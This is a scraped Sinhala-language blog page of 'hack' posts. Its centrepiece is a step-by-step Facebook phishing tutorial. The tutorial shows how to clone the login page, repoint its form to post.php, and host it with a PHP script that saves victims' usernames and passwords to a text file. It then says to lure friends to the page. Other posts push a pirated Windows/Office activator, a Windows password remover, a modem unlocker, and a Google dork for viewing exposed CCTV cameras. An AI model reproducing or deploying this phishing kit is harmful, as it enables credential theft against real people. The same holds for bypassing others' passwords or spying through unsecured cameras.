WHAT'S NEW?
Loading...
Showing posts with label Hack. Show all posts
Showing posts with label Hack. Show all posts


Best way to hack FACEBOOK 100% Sure

ඉතින් මම  මුලින්ම කියන්න කැමති මේක මම ඔයාලට කියන්නේ ඉගෙනුම පිනිස පමණක් බව.එක නිසා මේක නරකට යොදාගන්න එපා. එකත් මතක තියාගෙන වැඩේට බහිමු එහෙනම්. වැඩේට බහිමු කියුවට අද බහින්න දෙයක් නෑ. බලාගන්න පුලුවන් වෙන්න විඩියෝ එකක්ම මම දැම්මා. ඔයාලාත් ඒ විදිහටම කරන්න.
video l youtube - 


Download code from here : http://www72.zippyshare.com/v/78471943/file.html
www.smartworldsl.com
Navidu shihan jayasinghe


2014 New
Microsoft Product ඔක්කම Active කරන්න පුලුවන්  Activator එකක් අරගෙනයි මන් අද අවෙ. මේකෙන් Windows 7, Windows 8, Windows 8.1 හෙවත් Windows blue වගේම Microsoft Office 10 හා Microsoft Office 13 සාර්ථකව Active කරන්න පුලුවන්. ගොඩක් වටියි කියල හිතනව. 

අපිට Like එකක් දාන්න අමතක කරන්න එපා.

Connection Speed Slow නොවී Block කරපු සයිට් වලට යන්න මෙන්න ක්‍රමේ... 
(Anonymous Surfing)විශේෂ වාසි: කිසිම Software එකක් Install කිරීමට අවශ්‍ය නැත, එමනිසා Slow නැත. 

මෙතැන සිට කියවන්න______________
 http://www.proxy-list.org කියන සයිට් එකට යන්න.. 1රූපයේ පරිදි ඔයාට එම අවස්තාවෙ පෙන්වන අකුරු ටික නිවැරදිව ටයිප් කලාම ඔයාට 2 රූපයේ පරිදි වැඩකරන ප්‍රොක්සි ලිස්ට් එකක් පෙන්වාවි, ඒවායින් Uptime එක වැඩි එකක් ( චයිනීස් එපා) තෝරගන්න.. 


ඔයාගෙ Web Browser එක මොකද්ද ??

Firefox සඳහා.. 

ඉන්පස්සෙ firefox ගිහින් 3 රූපයේ පරිදි Options ඔබල 4 රූපයේ දැක්වෙන Network->Settings බොත්තම ඔබල 5 රූපයේ දැක්වෙන් Interface එක ලබාගන්න.. 5 රූපයේ දක්වා ඇති ආකාරයට ඔයා කලිත් ප්‍රොක්සි ලිස්ට් එකෙන් තෝරාගත් I.P එක හා port ඇඩ්‍රස් එක දමා සේව් කරන්න.. ඉන්පසු බ්ලොක් කරපු සයිට් ඕනි එකකට යන්න පුලුවන්.. 




Chrome සඳහා..

 ඉන්පස්සෙ 6 රූපයේ පරිදි Options යන්න. මීළඟට 7 රූපයේ දක්වා ඇති පරිදි, Network -> Change Proxy Settings ඔබන්න. එතකොට Internet Properties කියන Interface එක එනවා.. ඔයා ඒකෙ තියන Internet Connection සෙට් එකෙන් ඔයා දැන් පාවිච්චි කරන connection එක තෝරල 7 රූපයෙ අංක 2න් දක්වා ඇති පරිදි Settings button එක ඔබන්න. එවිට ඒ Connection එකට අදාල Interface එක දකින්න පුලුවන්. ඊට පස්සෙ 7 රූපයේ අංක 3න් පෙන්වන පරිදි Proxy Server යටතේ තියන "Use a proxy server for this connection" කියන එකට ටික් එක දාලා අංක 4 පරිදි Advanced කියන එක ඔබන්න. එවිට ඔයාට 8 රූපයේ පරිදි Proxy Settings Interface එක දකින්න ලැබේව්. ඒකෙ "Use the same proxy server for all protocols" කියන ටික් එක දාලා 8 රූපයේ අංක 3 න් දැක්වෙන පරිදි "Proxy address to use" යටතේ HTTP: ඉදිරියෙන් අර කලින් තෝරාගත් I.P එක හා Port Address එක දමන්න. ඉන්පසු සියල්ලම "OK" කරන්න .


වැඩේ හරිද?? 

ඔයාට වැඩේ හරි ගියාද කියල check කරගන්න පුලුවන් මෙන්න මෙහෙම.. www.google.com කියල ගැහුවම ඒක ඉබේම www.google.lk කියල මාරු වෙන්නෙ නැතිනම් වැඩේ හරි.. දැන් ඔයාට ලංකාව ඇතුලෙ Block කරල තියන ඕනිම සයිට් එකකට යන්න පුලුවන්..  ප්‍රයෝජනවත් ඉඟි... *) ඔයා 2 රූපයේ දී හැම විටම list එකේ උඩින්ම තියන Uptime එක වැඩි Proxy තෝරාගන්න*) ටික දවසක් හෝ පැය කීපයක් යනකොට නිකං Internet connection එක slow වගේ දැනෙනවානම් අර මුල් සයිට් එකට "www.proxy-list.org" ගිහින් අලුත් Proxy එකක් අරගන දාගන්න*) Proxy එකක් දාලත් ඔයාට අවශ්‍ය අර සයිට් එකට ගියාම ඒක Block කරලනම්.. ඔයා තෝරගත්ත Proxy එකට අදාලෙ රටෙත් ඒ සයිට් එක Block කරලා.. එහෙම වෙලාවට නැවතත් අර මුල් සයිට් එකට "www.proxy-list.org" ගිහින් වෙනත් රටක Proxy එකක් හොයල දාගන්න, Chinese Proxyවලින් එහෙම ගියාම සෑහෙන්න Blocked , ඒ නිසා USA වගේ එකක් තෝරගන්න
******************************************************************************
එහෙනම් මන් ගියා ඔයාලට මේ ලිපිය වැදගත් වුනනාම් කමේන්ඩ් එකක් දාල යාන්න අමතක කරන්න එපා.............

අපිට Like එකක් දාන්න අමතක කරන්න එපා.
http://hack-solutions.com/wp-content/uploads/2014/01/Facebook-logo-big-blue.jpg

මුලින්ම මන් කියන්න ඕනෙ මේක වැරදි වැඩ වලට භාවිතා කරන්න එපා. මේක phishing method එකක්. ඒ කියන්නෙ මේකට Hack වෙන කෙනාගෙ පොඩි අනුග්‍රහයක් ඕනෙ.

හරි හරි අපි වැඩේට බහිමු. මුලින්ම ඔයාල Facebook Log out වෙලා ඔයාල browser එකේ ඉදන්ම ctrl+U හෝ ctrl+V press කරන්න.නැත්තම් පහත ආකාරයට Right Click කරල View Page Source යන්න click කරන්න.


එතකොට ඔයාලට code view එකක් ලැබෙයි. ඒ code එක සම්පූර්ණයෙන්ම copy කරන් (ctrl+A >> ctrl+c) note pad එකකට past කරගන්න (ctrl+V) දැන් එකේ ctrl+F press කරල පහත ආකාරයේ code කැබැල්ලක් හොයා ගන්න.

action="https://www.facebook.com/login.php?login_attempt=1"

දැන් එහි උඩු කොමා වල තියන link එක මකා post.php කියල type කරන්න.මෙන්න මේ විදිහට...

action="post.php"

දැන් එම note pad එක save කරගන්න ඕනෙ නමුත් එහි නම index.htm විය යුතුයි. .htm කියා අනිවාර්යයෙන් තිබිය යුතුයි.

දැන් ඒක එහෙම්ම තියල තව note pad එකක් අරන් පහත් cede එක ඒකට past කරගන්න.

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



දැන් අපි මේ File එකත් save කරගන්න ඕනෙ. හැබැයි ඒක save කරන්න ඕනෙ post.php කියල. දැන් අපිට file 2ක් තියනව.


හොදයි ඊලග පියවර තමා අපි මේ file 2 Host කරගන්න ඕනෙ. අපිට මේකට Free hosting දෙන සේවයක් යොදා ගන්න පුලුවන්. මන් මේ පහතින් දාන ඒවයින් එකක ඔයාල account එකක් හදල මේ file 2 host කරන්න.එක මන් දැන් කියල දෙන්න යන් නෑ. ලේසි වැඩක්. බැරි උනොත් මගෙන් අහන්නකො.

www.000webhost.com/

www.5gbfree.com/ 

දැන් වැඩේ ගොඩ.  ඔයාලට හම්බෙන link එකට ගියාම facebook වගේම interface එකක් ලැබෙයි. ඉතින් hack කරන්නනම් ඔයාලගෙ යාලුවව මේ ලින්ක් එකෙන්  log කරවන්න ඕනෙ. ලොග්  උනාම ඔයාලට දකින්න පුලුවන් host කරපු තැන txt file එකක් එකේ ඇති ඔයාගෙ යාලුවාගෙ facebook username එකයි password එකයි.

මේ මගේ phishing site එක >>>>>> 

 

අපිට Like එකක් දාන්න අමතක කරන්න එපා.

ඔන්න ඉතින් අද මම ගෙනාව හොදෙයි කියලා හිතෙන දෙයක්. ආයෙ කියන්න දෙයක් නෑ නියමෙට වැඩ හොදේ.  විඩියෝ එකක් බලලා හදාගන්න මම විඩියො එකක් දැමම් ඔං එහෙ නම් වීඩියො එක බලලා වැඩේ කරන්න..ඇ,......හැබැයි ඉතින් මෙක පාවිච්චි කරන්න දැන ගැනිම පිණිස විතරක් නැතුව අනුන්ගේ ෆ්බ් හැක් කරලා වැඩක් නෑ නේ..
මම නම් මෙකේන් කාගෙවත් ෆෙස්බුක් හැක් කරේ නෑ .මම මගේ එවම දීලා තමයි මෙක අත්හදා බැලුවේ ...

1 වෙනියටම මෙක බාගන්න 


ඉට පස්සේ පහත ලින්කුවෙන්  සයිට් එකට යන්න. ඉන් පසුව වෙන සියල්ල විඩියොවෙන් බලා සාදා ගන්නා ලෙස මෙයින් දන්වා සිටිමි   :)

මෙතනින්

පොඩ්ඩක් සද්දෙ වැඩි කර ගන්න හොදේ......




ALL Windows Password Remover

මම අද ඔයාලට දෙන්න යන්නේ ගොඩක් වටින software එකක්.මේකෙන් ඔයාට ඕනම windows operating system එකක (win xp,win vista,win 7.....) administrator,user password කඩන්න පුලුවන්.කරන්න තියෙන්නේ මෙච්චරයි.මුලින්ම ඔය software(image) එක download කරගන්න.

MB 9

ඊට පස්සේ ඔය image එක cd එකකට burn කරගන්න.දෑන් cd එකෙන් computer එක බූට් කරන්න.boot වෙනකොට රුසියන් වචන වගයක් වෑටෙයි ඒවා ගනන් ගන්න එපා
ඊලගට ඔයගේ computer එකේ තියෙන windows operating systems ටික වෑටෙයි.windows operating systems ටික කිව්වේ dual boot එහෙම දාලා තියෙන කට්ටියට.ඔයා එතනින් එකක් select කරම operating system එකේ තියෙන user accounts,administrator ඔක්කොම වෑටනෙවා.ඊට පස්සේ ඔයාට කෑමති account එකක් තෝරලා password remove කරන්න පුලුවන්
තේරුන් නෑත්තම් මේක බලහන්කෝ


1) burn the image to the cd/dvd. 2) then restart the pc. 3) Wait untill it asks any thing from you . 4) Remove the password of the admininstrator. 5) Enjoy..
මේ software එක වෑරදි විදිහට පාවිච්චි කරන්න නම් එපා
ඔය පන්ඩිතයෝ එකකේ දෙන්නෙකුට ගේමක් දුන්නට නම් මම මුකුත් කියන්නේ නෑ

bye මම ගියා :)


 


මේකBlog එකේ කලින්Dongle Unlock කරන විදිය දාලා තිබුනා. ඒත් ඊටවඩා ගොඩක් ලේසි ක්රමයක් මටසෙට් වුනා. මේක හරියටම කලොත් යන්නෙ විනාඩියක් වගේ සුලු කාලයක්.    
මේ සොෆ්ට්වෙයා කෑල්ලෙ නම DC- Unlocker 









මෙන්මේ සොෆ්ට්වෙයා එබාගන්න.
මෙතනින්
Mb 3

 
දැන් dccrap.exe open කරගන්න.
දැන් Select manufracture එකටmodem එකේ නමතෝරන්න.
දැන්Select model වලට Auto detect_ (Recommended ‍තෝරන්න)

දැන් Detect card බොත්තම ඔබන්න

දැන් unlocking Tab (දකුනු පැත්තෙ තියන) වලට ගිහින්
Unlock button එක ඔබන්න.

දැන් ටික වෙලාවකින් Unlocked කියලා වැටේවි.
සැලකිය යුතුයි:
Hauwei dongle වලට මෙහිදීunlock code එකක් ඉල්ලන අතර එය බලාගැනීමට මේ  පොඩිSoftware එක Download කරගන්නමෙතනින්


පමනක් unlock කරන්න බැරි dongle පහත සයිට් එකෙන් ගිහින් වර්ගය දීලා software එක බාගන්න..මෙතනින්

  අදහස් යෝජනා චෝදනා ඕන එකක් පහත දාන්න. 
 

මෙම ලිපියෙන් ඔබට ZIP ගොනුවක ඇති රහස්‍ය පදය නොමැතිව විවෘත කරගන්නා අයුරු කියා දෙනු ලැබේ.
මෙම ZIP ගොනුවක් විවෘත කරගැනීම පිළිබඳව විස්තරයක් පියවරනේ පියවර පහතින් දක්වා ඇත. පහත සඳහන් කර ඇති අයුරින්ම ක්‍රියා කිරීම මඟින් ඔබ සතුව ඇති රහස්‍ය පදයක් යොදා ඇති ZIP ගොනුවද විවෘත කරගත හැකි වනු ඇත.



1. ලිපියේ පහතින් ලබා දී ඇති Nullsoft Scriptable Install System (NSIS) මෘදුකාංගය බාගත කරගන්න.

2. ඔබගේ පරිගණකයට එම බාගත කරගනු ලැබූ මෘදුකාංගය ස්ථාපනය කරගන්න.

3. ඉන්පසු NSIS මෘදුකාංගය විවෘත කර Installer based on ZIP Files යන්න මත ක්ලික් කරන්න.
image

4. පසුව ඩයලොග් බොක්ස් එකක් ලැබෙන අතර, එයින් Open යන්න මත ක්ලික් කර ඔබට විවෘත කරගැනීමට අවශ්‍ය කරන ZIP ගොනුව තෝරා දෙන්න.
image

5. ඉන්පසු Generate යන්න මත ක්ලික් කරන්න.

6. මොහොතකින් ඔබට තවත් ඩයලොග් බොක්ස් එකක් ලැබෙන අතර, එහි Close යන්න ක්ලික් කරන්න.
image

7. ඉන්පසු ඔබගේ ZIP ගොනුව ඇති තැනට යන්න. එවිට ඔබට ඔබගේ ZIP ගොනුවේ නමට EXE ගොනුවක් තිබෙනවා දැකගත හැකියි.
image

8. ඒ මත ක්ලික් කර, Install යන්න මත ක්ලික් කරන්න.
image

9. දැන් එම ගොනුවෙහි තිබූ දෑ ඔබ extract කරනු ලැබූ තැන තිබෙනවා දැකගත හැකියි.


බාගත කරගැනීම්:-මෙතනින්


ඔන්න ඉතින් තව පොඩි කුප්පියක් අරගෙන ආවා.. පොඩි කුප්පියක් කිව්වට මේකෙත් අමුතුම ගතියක් තියනවා.. මොකෝ කියන්නේ ඕනෑම කෙනෙකුට ලෝකේ වටේ තියන CCTV ගෙදර ඉදන්ම බලන්න පුළුවන් චාන්ස් එකක් දෙනවා කිව්වොත්.
.. ම්ම්ම්ම් එහෙමද ආස.. :D ලොලේ ලොල් කියල එහෙනම් අද ලිපියෙන් දෙන්න යන්නේ එක එක තැන්වල තියන CCTV වලින් බලන්නේ කොහොමද කියලයි.. ඈ ඈ .. එතකොට ආව හිනාව නේද.. ඇති ඇති පැණි හිනාව.. .. :D හරි එහෙනම් මෙන්න මෙහෙමලු වෙන්නේ හරිද.. මේක වෙන්නේ ඔන්ලයින් හොදද.. නැතුව ඉතින් Live CCTV අහවල් විදිහට බලන්නද නේද ... :D 

බීච් වල, හොටෙල් වල, රෙස්ටෝරන්ට් වල, මහා පාරවල්වල, පාක් වල, නයිට් ක්ලබ් වල(ත් ඇති :D) එහෙම තියන CCTV,LiveCam විවිධ ආරක්ෂක හා වෙනත් හේතු උඩ සජීවීව අන්තර්ජාලයට යොමු කරලා තියනවා.. ඔන්න අපි කොරන්ට හදන්නේ අන්න එව්වට හොම්බ දාන එකයි... අනුන්ගේ එව්වට හොම්බ දාද්දීත් අමුතුම පාට පාට ගතියක් තියනවනේ.. :D එහෙනම් වැඩේ පටන්ගමු නේද ? 

දැනට ඉතින් ලංකාවේ කියල CCTV තියෙන්නේ කොලොම්පුරේ විතරනේ.. තව ඉස්සරහට මුළු ලංකාවේම වැඩ කෑලි ගෙදර ඉදලම බලාගන්න පුළුවන් වේවි..

මෙතනින් කොටන්නකෝ.. Search Result එකින් එක බලන්නකෝ.. එක එක CCTV හම්බ වෙයි..

එහෙම නැතිනම් අපේ සයිබර් එක ගුගල් එක වෙතට ගිහින් පහල තියන ටික කොටන්න.. එතකොට එන Result වලින් තියෙන්නේ ඔය කලින් කිව්ව CCTV තමා.. පොඩ්ඩක් කරක් ගහල හොයාගන්න පුළුවන් අවශ්‍ය දේවල්... (මමනම් දන්නේ නෑ මොනවද කියලා) 

මෙන්න තියනවා කොටන්න ඕන ටික..
inurl:view/index:shtml

හරි එහෙනම් ඔන්න ඒ ලිපිය ඉවර කළා හොදේ.. ඉතාමත් ඉක්මනට තවත් ආස හිතෙන මේ වගේම එල ලිපියකින් සෙට් වෙමු ඈ..

එහෙනම්..
ඔබට ජය වේවා..!!
ඔයාලා ස්කයිප් එකෙන් රට ඉන්න අයට කෝල් කරනව නම් , ගෙදර ඒ වෙලාවේ මේ වීඩියෝ එක බලන්න ඉදියේ නැත්තම් එහෙම දැන් දුක් වෙන්න ඕනේ නෑ
.ඔයාලට පුලුවන් ඕනෙම ස්කයිප් වීඩියෝ ,ඕඩියෝ රෙකෝඩ් කරන්න.


මේ සොෆ්ට්වෙයා එක සම්පූර්ණ එක ඕනෙ අය දා ගන්න මෙන්න මේ ලින්ක් එකෙන් ඩවුන්ලෝඩ් කර ගන්න.


මෙතනින් බාගන්න

mb 16 විතරයි.......